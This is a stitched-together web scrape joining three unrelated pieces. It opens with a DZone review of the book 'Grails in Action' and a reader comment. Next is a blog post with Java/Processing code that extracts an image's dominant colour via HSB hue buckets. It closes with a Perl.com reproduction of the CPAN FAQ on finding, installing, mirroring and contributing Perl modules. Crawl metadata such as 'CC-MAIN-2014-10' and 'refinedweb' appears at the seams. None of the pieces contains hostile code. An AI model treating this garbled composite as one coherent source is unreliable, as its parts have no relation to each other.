Alternative view technologies, especially Wicket, might have been discussed, either here or elsewhere in this book. Personally, I've drunk the Wicket juice and believe, along with other Wicket believers, that code should not be mixed inside the view layer, which is what JSP and GSP are both guilty of. I know there's a Wicket plugin for Grails and would have been interested in having a thorough introduction to how to integrate it somewhere in this book. The AJAX component model that Wicket provides is one area where the Wicket approach might be preferable to the heavy tagging (i.e., further embedding of code into the view layer) imposed by the way Grails handles AJAX.
Part 3: Everyday Grails
This part excellently covers exactly those topics I wanted to learn about after reading the previous chapters. I.e., the questions I was then left with were: "What about autocompletion, charts, and similar features?", "What about step-by-step forms, i.e., how to transfer data between pages?", "What about security?", "What about REST?" In addition to these topics, there is also a very interesting discussion about the integration of JMS and Quartz, via the respective plugins.
- "Chapter 8: Using plugins: adding Web 2.0 in 60 minutes":
Some plugins have already been referenced or used earlier in the book. Here, though, we get a first look at the plugin architecture of Grails applications. After the architecture and installation explanations, very practical explanations are provided on adding charts and graphs, as well as mail support. Ten pages on adding a full text search feature, as well as a bunch of typical UI features, such as tooltips, autocompletion, and calendars, are included as well.
Highlights:
- Charts and graphs. Starts with a nice intro "Creating your first chart", which really shows how to get started with charts, from scratch. And, before you know it, you've created a 3-D pie chart, a Google bar chart, and a multiseries line chart.
- GrailsUI plugin discussed in detail: "There are numerous Grails plugins for adding more UI sizzleto your app, but one of the most popular (and easy to use) is the GrailsUI plugin." Via this plugin, you're introduced to tooltips, rich-text editing, calendar-style dates, and autocomplete.
- A tip at the end of the chapter: "Explore GrailsUI. The GrailsUI plugin has a wealth of custom components you can use. You know all the basics now, so adding new components to your library will be easy. Take the time to browse the GrailsUI documentation to see what UI features are available."
- "Chapter 9: Wizards and workflow with webflows":
Here's the problem statement solved in this chapter: "What if you have a signup process that spans several pages? Or what if your shopping cart checkout needs to optionally give the user shipping preferences based on their location? You can solve these issues with your current knowledge of controllers and a bunch of redirects with hidden form variables, but you'd be writing your own state engine, and dependending on the complexity of the flow, things can get complex quickly."
Highlights:
- Covers the way Grails handles web flows, in a lot of detail, with many code snippets. Yet another great and succinct definition: "A Grails webflow is a series of logical steps displaying various screens through which the user progresses to arrive at a final destination."
- Many practical tips & tricks throughout this chapter. I.e., when to use webflows, but also when NOT to use webflows. Inevitably, since the book focuses so strongly on testing, there's even a discussion (section 9.4) entitled "Testing webflows".
- Very good code snippet (page 258) is analyzed and expanded upon in a lot of detail to explain how webflows work. And how about this code snippet for an apposite example: "Invoking a stateful service to validate the card." The code snippets throughout this chapter, as everywhere else, are excellent.
- "Chapter 10: Don't let strangers in - security":
The chapter on testing. It covers—unit testing, integration testing, and functional testing.
Highlights:
- All the view tags for a custom login form, on page 300, is yet another example of how directly usable this book is.
- Plugins discussed—Authentication plugin, JSecurity plugin, and Spring Security (Acegi) plugin. Also JAAS. However, the focus is on the Spring Security plugin, with the first step how to install it and then you integrate it very quickly and easily into your application.
- A tip at the end of the chapter, about obfuscation: ."
- "Chapter 11: Remote access":
The chapter focuses mainly on REST. Then, it also shows RMI (via the remoting plugin) and SOAP. As usual, a long list of very useful best practices closes the chapter. Nice segway from previous chapter: "Now that you have a good grounding in securing an application from attack and unauthorized access, it's time to look at how other software (other than web browsers) can use and interact with your Grails applications."
Highlights:
- Over 20 pages on REST so set you on the right track—choosing resource IDs, providing access to resources, serializing & deserializing, as well as a section on testing your REST API.
- Thorough introduction to the Grails Remoting plugin, including a comparison of remoting protocols, RMI, HTTP invoker, and Caucho's Hessian & Burlap. The next section discusses SOAP, via the Grails plugins for Axis.
- Example tip from the end of the chapter: "Put some thought into your URLs. Good URLs are long-lived, consistent, and easy to understand. Although poor URLs are unlikely to have an impact on your API feature-wise, they can make life harder for those using it. If you do that, users will not bother using it. You can find plenty of articles on-line about good URL design."
- "Chapter 12: Understanding messaging and scheduling":
The chapter on JMS (messaging) and Quartz (scheduling).
Highlights:
- Nicely practical focus for the messaging story: "In this chapter, we'll add a messaging system to our application so we can create a link between it and Jabber, a popular instant messaging system." Similarly, here's the focus in the scheduling part of the chapter: "Kicking off a daily backup? Sending out daily digest emails? Regenerating your full text index? Every developer needs to deal with these kinds of scheduled events occasionally."
- Excellent introduction to messaging in general, covering a lot of common terminology, such as 'products','consumers', 'topics', and 'queues'. Nice diagrams too.
- Covers everything you'll want to know about messaging and scheduling—with heaps of code snippets again—plus the usual tips and tricks at the end of the chapter. Very clear as always: "Use queues when you want a message to be processed by one listener, and use topics for broadcast scenarios."
Part 4: Advanced Grails
- "Chapter 13: Advanced GORM kung fu":
Deals with tuning your queries to run more efficiently, query-caching options, and the refactoring of domain classes. Performance and scalability of your application, where it relates to GORM is handled in detail here. The P6Spy plugin and JMeter are installed and used to analyze query timings, handy when preparing for getting overloaded by queries as the application gets bigger and more popular.
- "Chapter 14: Spring and transactions":
Bit of a deepdive into the underpinnings of Spring, beneath the Grails framework. I have a feeling that one should never actually need to go this far, in typical cases, but that's why this is part of the advanced part of the book so it's good to have there. I'm not advanced enough at this point to really get a lot out of this chapter, though I'm sure I'll get back to it later.
- "Chapter 15: Beyond compile, test, and run":
The chapter that focuses on influencing and extending the build cycle. Integration with existing build tool, as well as Grails' own build system, i.e., Gant is introduced.
Highlights:
- The reason given for the existence of Gant seems a bit tenuous. After stating that Grails could have used one of the existing build tools, requiring you to download Ant or Maven and then set it up, page 417 explains: "that would go against the Grails philosophy of providing everything you need out of the box (except Java)!" I can't help but think that he reason for Gant is simply that it provides the developer with a Groovy approach to Ant scripting.
- Section 15.1.2 is great, teaching you step by step how to create a brand new Grails command "grails dist", which creates a distribution for your Grails applications.
- Section 15.2 is excellent in catering to those who have already standardized on Ant or Maven, meaning that the Gant system cannot be adopted in such cases. The Maven Grails archetype is introduced in 15.2.2, while the previous subsection uses Ant and Ivy instead of Gant as your build tool.
- "Chapter 16: Plugin development":
Everything you need to know about creating your own plugins that extend the features offered by the Grails framework to your applications—creating your first plugin, publishing & testing your plugin, and integrating with the Grails infrastructure.
Highlights:
- Didn't know this before: you can run a plugin using 'run-app', just like a standard Grails application. Also: "The most visible difference between a plugin and an application is the presence of a plugin descriptor, the SecurityGrailsPlugin.groovy file."
- "Integrating with Grails" covers a lot of interesting material—adding your own dynamic methods, handling class reloading at runtime, cofiguring your own Spring beans, adding entries to the application's web.xml (i.e., dealing with servlets and filters), and implementing extra commands.
- Example tip from the end of the chapter: "Use local plugin repositories for teams. Local plugin repositories serve several purposes. First, they allow you to control which versions of plugins are installed by your team by default. Second, they allow you to customize public plugins foryour own purposes. Last, they can be useful for modulerizing applications."
Mike Miller replied on Fri, 2009/07/10 - 11:15pm
Nice review. I've been waiting on a review of this book.
I recently reviewed "The Definitive Guide to Grails" which appeared in the Groovy Zone on this site, but I am a BIG fan of the "In Action" series of books. Now I need to figure out if I should read this book too because I am really enjoying Groovy and Grails. | http://groovy.dzone.com/reviews/grails-action | CC-MAIN-2014-10 | refinedweb | 3,327 | 62.27 |
Have you ever used strings before? That's right, those "arrays of characters" we all know and love? Unless you code only in C, I'd bet you have - and maybe even a lot.
But what about using a lot of strings? Or using strings that your program didn't generate? Maybe you're reading an email, parsing command line arguments, or reading human instructions, and you just need a more structured way to handle this.
Sure, you could iterate over each word or element in the strings. And you'll probably understand the code you used to do so. But for large applications, that can become very overwhelming - and very expensive to maintain.
Enter: The Regular Expression
Without getting too deep into computer science, let's define a Regular Expression real quick.
- Regular expressions are the grammars describing a Regular language
- Regular languages are a form of formal language that can be described by a finite state machine
There are a number of better explanations on regular languages out there, so if you're not happy yet, just google for a couple minutes.
Enter: The Regex
If it hasn't already, here's where it gets funky... I draw a distinction between what programming languages call "regular expressions" and what computer science calls a regular expression.
- Computer Science Regular Expression - a grammar to describe a regular language
- Programming Language Regular Expression - a grammar to describe, at most, a context-sensitive language
Context-sensitive languages are a good deal more complex and useful, so we'll call a programming language regular expression "regex" now to solidify the distinction that its languages are not regular.
Learning to Write Regexs
Regexs are described between //'s and match strings if they fit the 'pattern' defined between the two //'s. For instance,
/Hi/ matches "Hi", so we can check a string to see if it is (or has, more on that later) "Hi" in the string using a regular expression.
We match characters in a string with regular expressions by typing them normally. For instance,
/Hello World/ will match the string "Hello World".
We could simplify this to match any word by adding a little regex magic:
\w matches any "word" made of only letters:
\w will match any one word (if only letters).
We can similarly match numbers with
\d.
Example 1
Great, so we can perform string equality or see if strings fit some simple pattern now. So what? Can they be more useful?
You bet! Let's say we wrote an IRC chat bot that listens for someone to say "Josh". Our bot basically scans each message someone says in the channel until we get a match. Then, the bot will respond "Woah, I hope you aren't talking bad about my pal Josh!" Because Josh's only friends are robots.
...
Our bot will use the pattern
/Josh/ to match the strings.
Suddenly, some named Eli stumbles along: "Eli: Josh, do you really need that much caffeine?"
Our bot will kick in gear and scan the message with
/Josh/ and find one match! So he replies, and Eli is sufficiently creeped out. Mission accomplished!
Or was it?
What if our bot was more intelligent? What if the bot addressed whoever spoke by name? Something like "Woah, I hope you aren't bad-mouthing my buddy Josh, Eli."
Quantifiers (Repeating Characters)
0 or Many
We can do that... but we've got to learn a few things to get there. First off, Quantifiers (for Repeating characters).
We can use * to match 0 or many characters before it. For instance,
/a*/ matches "aaaaa" BUT ALSO "". That's right, it will match the empty string.
* serves to match something optional, because the character it matches doesn't have to exist. But it can. And it can exist many, many times (theoretically infinitely many times).
We can match "Josh" with
/Josh/, but we could also match "JJJJJJJJJosh" and "osh" with
/J*osh/.
1 or Many
+ can be used to match 1 or many characters. It effectively works the same way as * does, except the character existing is no longer optional. We have to have at least one of those characters to match now.
So, we can match "JJJJosh" and "Josh" with
/J+osh/ but not "osh".
Wildcards
Great, we can match a lot more interesting features now. Maybe someone screaming "Joooosh" if they're really mad at me...
But what if they're so mad that they slam their face on the keyboard? How do we match "afuhiudgosigs" if we don't know how pointy their nose is?
With Wildcards!
Wildcards allow you to match ANYTHING. Their syntax is
.. (Yes, just a period. Period.). You'll probably use this a lot, so don't confuse it for matching the end of a sentence.
We can use this to match "Joooafhuaisggsh" by combining our knowledge of repeating characters and wildcards in this regex:
/Jo+.*sh/. To be clear, this will match 1 "J", 1 or more "o", 0 or many wildcards, and 1 "s" and 1 "h". Those five blocks lead us to what we call...
Character Groups
Character Groups are the blocks of characters that appear in order in a string. When you use a
* or
+, you're actually matching many of the last character group, not just the last character.
This is useful to understand in its own right, but combined with repeating characters, can be very powerful. To do this, we can define our own character group by using parenthesis (that's these guys).
Let's say we want to repeat "Jos" but not "h". So "JosJosJosJosJosh" will match. We can do this with the regex
/(Jos)+h/ Easy, right?
But finally... back to our example, how can we get Eli's name in the IRC chat message he sent?
Character groups are also a means of remembering parts of the string. This way we can add parts of a string to variables in our programming code when we see a string that fits the pattern.
To do this, typically you'll do something like
\1 to match the first specified group.
For instance,
/(.+) \1/ is a special one. Here we look at a group of random characters 1 or more times, have a space afterwards, and then repeat the exact same characters again. So this regex will match the string "abc abc" but not "abc def" even though "def" would match
(.*) independently.
Remembering matches is very powerful, and it will probably boil down to the most useful feature of programming with regular expressions.
Example 2
Whew... finally ready to continue with our IRC bot. Let's use what we learned to see who was talking smack.
If we want to capture the sender's name when they say "Josh", our regex can look like this:
/(\w+): .*Josh.*/ and we can save the match as a variable in our programming language for our reply.
That's just 1 or more letters followed by ": ", a wildcard for 0 or many characters, the string Josh, and a wildcard for 0 or many characters.
Note:
/.*word.*/is a simple way to match a string containing "word" that may or may not have other things around it.
In Python, that regex might look like this:
import re pattern = re.compile(ur'(\w+): .*Josh.*') # Our regex string = u"Eli: Josh go move your laundry" # Our string matches = re.match(pattern, string) # Test the string who = matches.group(1) # Get who said the message print(who) # "Eli"
Notice we used
.group(1) just like we'd use
\1 in the regex pattern. Nothing new here, aside from using the regex in Python.
Beginning and End
Until now, we've actually allowed matching strings to occur in any part of the string. For intsance,
/(Jos)+h/ will match any string containing the Jos-repeating-h anywhere in the stringg.
What if we wanted the string begin with Jos-repeating-h? We can specify this with
/^(Jos)+h/, where
^ matches the start of the string.
Similarly,
$ can be used to match the end of the string.
So if we want our pattern to match strings containg Jos-repeating-h from beginning to end, we can alter it to look like this:
/^(Jos)+h$/.
Character Options
But maybe you're writing a regex for a sandwich order. You don't know if the customer wants white or wheat bread, but you'll accept either. How do you add choice in a regex? With Character Options!
Character Options allow you to specify a set of possible values for a group. Syntax for this is
(white|wheat) in the context of our sandwhich, where either "white" or "wheat" would be accepted.
You could also use the
[brackets] to specify options in another way. Each character is an option here, instead of the total string of characters. I.e., "b", "r", "s", "t", e", "k", "c", "r" would each be accepted individually. But this could be handy for more complicated groups, as you can substitute a character for a more complicated expression inside a Character Group here.
Modifiers
We talk about regex's with
/slash marks/, right? We know what goes in the middle, but what goes on the sides?
Plot twist, nothing.
... goes on the left. The right side, however, has some very, very useful stuff. It's almost a shame we ignored it for so long!
Modifiers modify the rules with which the regular expressions are applied.
Here's a list of the most common modifiers (from Regex101.com):
For instance, until now, all of our examples have been case-sensitive. That means, capitalizing or lower-casing any one character would make that string no longer match the pattern. We can make our patterns case-insensitive with the
i modifier.
Maybe Eli was so mad at me that he spammed the chat with a Mix OF casE CHArACters. Never fear,
i is here! We can match his "I hAate LiVing witH JOSH!!!" rage with
/i ha+te living with josh!+/i. Now it's easier to read and more powerful and useful. Awesome!
I'll leave the rest of the modifiers for you to play with on your own, but I bet you'll find
igm to be your most used in general.
What's next?
Hopefully this article has shown you another useful way to interact with strings a little bit more intelligently. I've hardly even scratched the surface of regexs, but you already know how to use regular expressions for some minor tasks now.
There's an overwhelming number of symbols / tokens to use in your regexs. Typically you'll stumble on them from Stack Overflow searches, or you'll guess them from previous experience (\n is the new line character, for instance). You've more or less got what you need for now, but there's plenty still to learn.
You can get a full list of tokens and test your regexs extensively here. I still use this website almost every time I write regexs, because the testing tool is remarkably helpful and powerful. It even generates code for you if you're not sure how to do it in your programming language yet.
If this was a cakewalk for you, check out regex crossword puzzles. They'll really get you thinking with regex!
Discussion (6)
Hey, this is a great write-up! I've generally stayed as far away from regex as I can, but this actually has me thinking I can tackle it. Thanks!
regex101.com/
Thanks for all the kind words, everyone! I've been hoping to write a follow-up article to this since I originally wrote it in early 2017, but it's only in the brainstorming stages today. I do plan to convert this into a talk and give it at a few conferences around my area, though. Let me know if you're interested to have a little bit of a different talk at your meetup/conference, covering regexes and how I think they could save you lots of headaches :)
hi josh, stumpled upon this in dec'17. trying to solve this python kata codewars.com/kata/regex-password-v... and my regexp is rusty. are you interested not in giving me the solution, but showing me how to say and in RegEX and i read here stackoverflow.com/questions/469913...
best regards and happy coding
Trying to figure out a freecodecademy challenge with regex, and this was extremely helpful. Thanks!
Incredible! Beat write up on regex I've ever read. 🤘💯 | https://dev.to/hawkinjs/dont-fear-the-regex-a-practical-introduction-to-regular-expressions | CC-MAIN-2021-49 | refinedweb | 2,089 | 74.08 |
I’ve had an idea in mind for a while now, that requires extracting the dominant color from an image. I had no idea how to do this, and worried it would be really hard.
The first thing was extracting the pixels from the image for processing, this was super easy thanks to this handy image processing tutorial.
Some Googling took me to Stack Overflow (always a great starting point) and I discovered the concept of color “bins” – this makes sense, I’d imagine it’s quite possible that all pixels in an image are subtly different, and actually you want to group them in some way. This led me to find out about calculating distances between colors, which is a solved problem, but somewhat complicated.
Finally I ended up looking at HSB colors – hue, saturation, brightness, and this really simple tutorial. Colors are represented on a cone, and the values are as follows (from the tutorial).
Hue is the actual color. It is measured in angular degrees counter-clockwise around the cone starting and ending at red = 0 or 360 (so yellow = 60, green = 120, etc.).
Saturation is the purity of the color, measured in percent from the centre of the cone (0) to the surface (100). At 0% saturation, hue is meaningless.
Brightness is measured in percent from black (0) to white (100). At 0% brightness, both hue and saturation are meaningless.
At this point, it was clear to me that what I really wanted to do was to extract the dominant hue, and then I planned to average the brightness and the saturation. In the end, I decided to average the brightness and saturation for that hue, rather than for the entire image.
After this, it should have been easy, but I had some confusion in terms of the range of hues, and converting from HSB to RGB. This I eventually fixed by just setting the ColorMode and working purely in HSB. The ColorMode allows me to set the maximum range, and as I just round the float to an int I can make my buckets bigger or smaller according to that. It turned out that 360 ended up being pretty close to what I want, although I think 320 is slightly better! It’s interesting to see the change of the extracted “dominant” color as the buckets change in size.
If you liked this, you might also be interested in: Colors of the Internet (which I found as I was waiting for pictures to upload to this post – beautiful timing!)
Source Code
import processing.core.PApplet; import processing.core.PImage; @SuppressWarnings("serial") public class ImageViewApplet extends PApplet { PImage img; float hue; static final int hueRange = 360; float saturation; float brightness; public void setup() { size(640,600); background(0); img = loadImage("" /* Your image here */); colorMode(HSB, (hueRange - 1)); extractColorFromImage(); } public void draw() { image(img, 0, 0, 640, 480); fill(hue, saturation, brightness); rect(0, 480, 640, 120); } private void extractColorFromImage() {(pixel); hues[hue]++; saturations[hue] += saturation; brightnesses[hue] += brightness; } // Find the most common hue. int hueCount = hues[0]; int hue = 0; for (int i = 1; i < hues.length; i++) { if (hues[i] > hueCount) { hueCount = hues[i]; hue = i; } } // Set the vars for displaying the color. this.hue = hue; saturation = saturations[hue] / hueCount; brightness = brightnesses[hue] / hueCount; } }
4 thoughts on “Extracting the Dominant Color from an Image in Processing”
Wow this is so good..
Actually i still confuse with the “@SuppressWarnings(“serial”)” and
“public class ImageViewApplet extends PApplet {}”
I can’t run the program with it. So I decide to remove it.
I wanna ask for something, can I use this code for my project?
I will be very, very, grateful if you allow me… Surely I will insert this honorable source in my references..
Maybe I will also modified the program a little…
may I do that all?
Thank you very much! ^_^
[WORDPRESS HASHCASH] The poster sent us ‘0 which is not a hashcash value.
Thanks a lot !!!!!! | https://cate.blog/2013/08/26/extracting-the-dominant-color-from-an-image-in-processing/ | CC-MAIN-2020-50 | refinedweb | 662 | 61.56 |
Can you make a script run in Python 2 with an argument?
Is there a way of making a script run in Python 2 with an argument in the Run Options?
If not, is there another way of making a specific script run in Python 2 when Python 3 is my default setting?
@JSOgaard you can start a script in Python 2 with
from objc_util import * import os app = 'myfolder/myapp.py' path = os.path.expanduser('~/Documents/'+app) arg = ['1','2'] I2=ObjCClass('PYK2Interpreter').sharedInterpreter() # run a script like in wrench menu (path, args, reset env yes/no) I2.runScriptAtPath_argv_resetEnvironment_(path, arg, True)
@JSOgaard I don't remember for the App Store version but the beta provides this when you long press the run button | https://forum.omz-software.com/topic/5780/can-you-make-a-script-run-in-python-2-with-an-argument | CC-MAIN-2020-45 | refinedweb | 125 | 65.83 |
Common Questions About CPANby Jarkko Hietaniemi
July 29, 1999
CPAN Frequently Asked Questions
Here.
I. - General Questions.
- What is Perl?
- What is Perl6?
- What is the CPAN?
- What is PAUSE?
- How does the CPAN work?
- How does the CPAN multiplexer work?
II. - The Quest for Perl source, modules and scripts.
- Where can I find the current release of the Perl source code?
- Where can I find older/obsolete versions of Perl or Perl Modules?
- How do I interpret the Perl version numbers?
- How do I install Perl from the source code?
- Where can I find Perl modules?
- How do I install Perl modules?
- How do I find out what modules are already installed on my system?
- Where can I find the most recently uploaded Perl modules?
- Where can I find Perl modules for Windows?
- Where can I find Perl binaries/packages or Perl module binaries?
- How are Perl and the CPAN modules licensed?
- Does the Perl source distribution include any modules?
- What modules are platform dependent?
- Where can I find Perl scripts?
III. - RIF [ Reading is Fun-duh-mental ]
- Where can I find the Perl FAQs?
- Where can I find Perl documentation?
- Where can I find Perl module documentation?
- Where can I find Perl DBI/DBD/database documentation?
- Where can I find/join/create Perl mailing lists?
- Where can I find Perl journals/magazines?
- Where can I find Perl courses/training/on-line tutorials?
- Where can I find CPAN on a CD-ROM?
- How do I find/join/organise a Perl User Group?
- Where can I find a history of Perl releases or a general history of the Perl community?
IV. - Danger Will Robinson! Danger! Danger!
- I got an error downloading a module, what should I do?
- I downloaded a module/script/file but it was corrupt, what should I do?
- How do I use module Foo::Bar, can you help? (a.k.a. Are you a helpdesk?)
- When downloading a module a strange VRML viewer started up and I got an error, what should I do?
- Where can I find the GDBM_File/DB_File module?
- I'm having trouble with search.cpan.org, whom do I need to contact?
V. - Searching CPAN, CSPAN and the rest of the known universe.
- How do I search CPAN?
- How do I search for module/script documentation? (a.k.a. "How do I use ..."?)
- How do I search for really ANYTHING?
- How do I find Ralph Nader? (a.k.a. We're C-P-A-N not C-S-P-A-N!)
VI. - Contributing modules, patches, and bug reports.
- How do I contribute modules to CPAN?
- Does CPAN allow contributions of shareware or code that requests a fee of any kind?
- How do I contribute scripts to CPAN?
- How do I contribute documentation?
- How do I report/fix a bug in Perl and/or its documentation?
- How do I report/fix a bug in a module/script?
- How do I go about maintaining a module when the author is unresponsive?
- How do I adopt or take over a module already on CPAN?
- Is there a site for module bug reports/tests?
- Does CPAN provide download statistics for authors?
VII. - How to mirror CPAN.
- How do I mirror CPAN?
- What do I need to mirror CPAN?
- I have Windows 2000/NT/98/95, how can I mirror CPAN?
- Which CPAN site should I mirror?
- How do I register my mirror to make it a public resource?
What is Perl?.
See also
Two good starting points for Perl information are and
What is Perl6?.
"We're really serious about reinventing everything that needs reinventing." --Larry Wall
What is CPAN?
CPAN is the Comprehensive Perl Archive Network, a large collection of Perl software and documentation. You can begin exploring from either, or any of the mirrors listed at.
Note.
What is PAUSE?.
How does the CPAN work?.
How does the CPAN multiplexer work?.
Where can I find the current release of the Perl source code?
- - A detailed list of source code offerings.
The Perl Mongers have a "Download Perl" button for websites and if you are interested you can find it on their site at.
Where can I find older/obsolete versions of Perl or Perl Modules?).
-
-
-
- - for old versions of modules
How do I interpret the Perl version numbers?.
How do I install Perl using the source code?);
- MacOS (1)
- AS/400 (2)
- Novell Netware (2)
For these platforms a binary release may be the easiest path.
- The source code to compile MacPerl is available at.
- The source code for AS/400 and Netware Perls have not been merged to the main Perl source code distribution. If you want to try compiling them yourself, get the sources from or and then continue at
Where can I find Perl modules?: > =backEach.
-
-
-
- - an RSS format of /recent
Any of these should be good for your daily feed of new modules.
Where can I find Perl modules for Windows? has a FAQ for their Package Manager or which has a nice listing of Win32 resources including modules.
Where can I find Perl binaries/packages or Perl module binaries?.
How are Perl and the CPAN modules licensed? Copyright 1989-1999, Larry Wall.
Does the Perl source include any modules?
Yes, Perl comes with a number of useful modules and are listed in the perlmodlib pod:
-
- perldoc perlmodlib
What modules are platform dependent?
Several implementations of Perl on specific platforms come bundled with a collection of platform specific modules. Additional information is available for:
IBM OS/2
The following modules come with standard Perl.
- OS2::DLL
- Access to DLLs with REXX calling convention and REXX runtime.
- OS2::ExtAttr
- Access to extended attributes.
- OS2::PrfDB
- Access to the OS/2 setting database.
- OS2::Process
- Constants for \tool{system}(2) call on OS/2.
- OS2::REXX
- Access to DLLs with REXX calling convention and REXX runtime.
DEC (Open)VMS
The following modules come with standard Perl.
- VMS::DCLsym
- Perl extension to manipulate DCL symbols.
- VMS::Filespec
- Converts between VMS and Unix file specification syntax.
- VMS::Stdio
- Standard I/O functions via VMS extensions.
- VMS::XSSymSet
- Keeps sets of symbol names palatable to the VMS linker.
Microsoft Windows (32 bit)
The following modules come with ActiveState Perl.
- Win32::ChangeNotify
- Monitors events related to files and directories.
- Win32::Console
- Uses Win32 Console and Character Mode Functions.
- Win32::Event
- Uses Win32 event objects.
- Win32::EventLog
- Processes Win32 Event Logs.
- Win32::File
- Manages file attributes.
- Win32::FileSecurity
- Manages FileSecurity Discretionary Access Control Lists.
- Win32::IPC
- Loads base class for Win32 synchronization objects.
- Win32::Internet
- Accesses WININET.DLL functions.
- Win32::Mutex
- Uses Win32 mutex objects.
- Win32::NetAdmin
- Manages network groups and users.
- Win32::NetResource
- Manages network resources.
- Win32::ODBC
- Uses ODBC Extension for Win32.
- Win32::OLE
- Uses OLE Automation extensions.
- Win32::OLE::Const
- Extracts constant definitions from TypeLib.
- Win32::OLE::Enum
- Uses OLE Automation Collection Objects.
- Win32::OLE::NLS
- Uses OLE National Language Support.
- Win32::OLE::Variant
- Creates and modifies OLE VARIANT variables.
- Win32::PerfLib
- Accesses the Windows NT Performance Counter.
- Win32::Process
- Creates and manipulates processes.
- Win32::Semaphore
- Uses Win32 semaphore objects.
- Win32::Service
- Manages system services.
- Win32::Sound
- Plays with Windows sounds.
- Win32::TieRegistry
- Mungs the registry.
- Win32API::File
- Accesses low-level Win32 system API calls for files and directories.
- Win32API::Net
- Manages Windows NT LanManager accounts.
- Win32API::Registry
- Accesses low-level Win32 system API calls from WINREG.H.
Where can I find Perl scripts?
-
-
-
- and many, many other places on the net have Perl programs....
Where can I find the Perl FAQs?
The Perl FAQ is included with the Perl source code distribution.
- perldoc perlfaq
-
Where can I find Perl documentation?
-
-
- perldoc perldoc to use the documentation included with your Perl distribution.
- for those who have read all of the free documentation and want something they can read in the loo by candlelight.
Where can I find Perl module documentation?
-,
-
- perldoc Foo::Bar if the module is installed locally.
Where do I find Perl DBI/DBD/database documentation?
- - Alligator Descartes Definitive DBI page.
- - A mySQL Perl DBI/DBD Manual.
- - The DBI man page.
- perldoc DBI
Where can I find Perl mailing lists?
There are quite a few mailing lists with a broad range of topics.
-
-,
-
- - browseable web archives of many of the Perl lists.
Many of the lists are open for general subscription. If you don't see a list that interests you and would like to start your own you may ask lists@perl.org to set one up for you if you cannot host it yourself.
Where can I find Perl journals/magazines?
- - The journal in print for Perl.
- - a terrific on-line only journal.
-
- - Randal Schwartz' Web Techniques Columns.
- - ;login, the publication of USENIX.
- - System Admin Magazine has occasional Perl articles.
Where can I find Perl courses/training/on-line tutorials?
Training
Where can I find CPAN on a CD-ROM?
CPAN (cpan.org) does not produce CD-ROMs, sorry. Besides, these days one would need a DVD.
How do I find/join/organise a Perl User Group?
The Perl User Groups are known as "Perl Mongers" and have active groups all over the world. You can find an established group at or start a new group if one isn't near you via
Where can I find a history of Perl releases or a general history of the Perl community?
A history of Perl releases can be found in your Perl distribution via perldoc perlhist or via the web at.
A more general history of the Perl community, CPAST, can be found at.
I got an error downloading a module, what should I.
- What program were you using to download?
A Web browser?
An FTP client?
- Which server were you using?
Note that many Perl software servers redirect your WWW requests to a site (hopefully) nearer to you. For example, the perl.com multiplexer does that so you often aren't downloading from perl.com itself. If you are using a web browser, take a close look at the URL/Location. Also note that we cannot debug your network connectivity and if you have problems connecting to anywhere other than the CPAN master site,, we probably cannot be of service..
- What was the exact error message?
We are not clairvoyant so please include the exact error message, cut and paste if you must.
- Did you retry later?
The server might be temporarily busy or be offline and refuse connections for a while. Retry later or try another server.
I downloaded a module/script/file but it was corrupt, what should I.
How do I use module Foo::Bar, can you help? (a.k.a. Are you a helpdesk?).
When downloading a module a strange VRML viewer started up and I got an error, what should I;
- Open "My Computer" or Windows NT Explorer.
- Select the "View" menu.
- Select "Options".
- Click the "File Types" tab.
- Scroll through the "Registered file types" until you reach "WorldView VRMLViewer Object" and select it.
- Click "Remove".
- Answer "Yes". (I've never seen these VRML files WorldView claims to be caring about: if you have and you do care, please tell me how to make WorldView stop caring about the .gz and application/x-gzip)
- Quit and restart your browser for the change to take effect.
- The next time you try open a file ending in .gz Windows will ask you which application to use to open that file. Scroll down to WinZiP (winzip32), and remember to check the box asking whether to always use this application to open this type of file unless, of course, you plan on regularly using the VRML viewer.
Where can I find the GDBM_File/DB_File module?.
I'm having trouble with search.cpan.org, whom do I need to contact?
If you are experiencing difficulty using search.cpan.org due to network or server errors, you need to contact webmaster@search.cpan.org.
How do I search for anything on CPAN?
By using a CPAN search engine.
-
- - Graham Barr's search engine which can search for modules, distributions or authors in all of CPAN.
- - Randy Kobes' search engine that can also search all of CPAN for modules, documentation, etc.
- - full text search of pods on PAUSE.
-
-
-
How do I search for ANYTHING, really?
-
-
- (too many to list)
How do I find Ralph Nader? (a.k.a. We're C-P-A-N not C-S-P-A-N!)
You dialed the wrong number. The place you are looking for is.
How do I contribute modules to CPAN?.
Does CPAN allow contributions of shareware or code that requests a fee of any kind?.
How do I contribute scripts to CPAN?
CPAN has a scripts repository at and analyze the problem (to the extent you can) and report your discoveries.
- Can you fix the bug yourself?.
How do I report/fix a bug in a module/script?
Please contact the author of the module/script. The documentation of the module/script should.
How do I go about maintaining a module when the author is unresponsive?
Sometimes a module goes unmaintained for a while due to the author pursuing other interests, being busy, etc. and another person needs changes applied to that module and may become frustrated when their email.
- Be courteous.
- Be considerate.
- Make an earnest attempt to contact the author.
- Give it time. If you need changes made immediately, consider applying your patches to the current module, changing the version and requiring that version for your application. Eventually the author will turn up and apply your patches, offer you maintenance of the module or, if the author doesn't respond in a year, you may get maintenance by having interest.
- If you need changes in order for another module or application to work, consider making the needed changes and bundling the new version with your own distribution and noting the change well in the documentation. Do not upload the new version under the same namespace to CPAN until the matter has been resolved with the author or CPAN.
Simply keep in mind that you are dealing with a person who invested time and care into something. A little respect and courtesy go a long way.
How do I adopt or take over a module already on CPAN? trafficed site announcing your intention to take over the module. Potential places are,, and any appropriate mailing lists or web forums.
- Wait a bit. The PAUSE admins don't want to act too quickly in case the current maintainer is on holiday. If there's no response to private communication or the public post, a PAUSE admin can transfer it to you.
Is there a site for module bug reports/tests?.
Does CPAN provide download statistics for authors?
No we don't. sums up our thoughts on the matter quite well.
How do I mirror CPAN?
Either an FTP or rsync client will do. Scantily clad virgins and pale moonlight are optional and are not included in the sales price.
What do I need to mirror CPAN?
- "Good" Internet connectivity, e.g. better than a 14.4 modem but not so much as an OC3.
- Around 1GB of storage space. tells you the current size of the CPAN.
- An FTP or rsync client.
- For FTP there is a Perl script named mirror (which assumes a command line FTP client):
The FTP address for the CPAN master site is:
- and for rsync:"
I have Windows Vista/XP/2000/NT/98/95, how can I mirror CPAN?
Which CPAN site should I mirror?:
- For your mirror site to be useful to your users you should mirror daily.
- You can also provide a HTTP interface in addition to an FTP interface to CPAN if you wish to do so.
- Consider also giving rsync access to your mirror. Many people like rsync because it's very bandwidth-friendly.
- Remember to tell cpan@perl.org about all the access methods you provide to your mirror: ftp, http, or rsync (or any other methods).
How do I register my mirror to make it a public resource?.
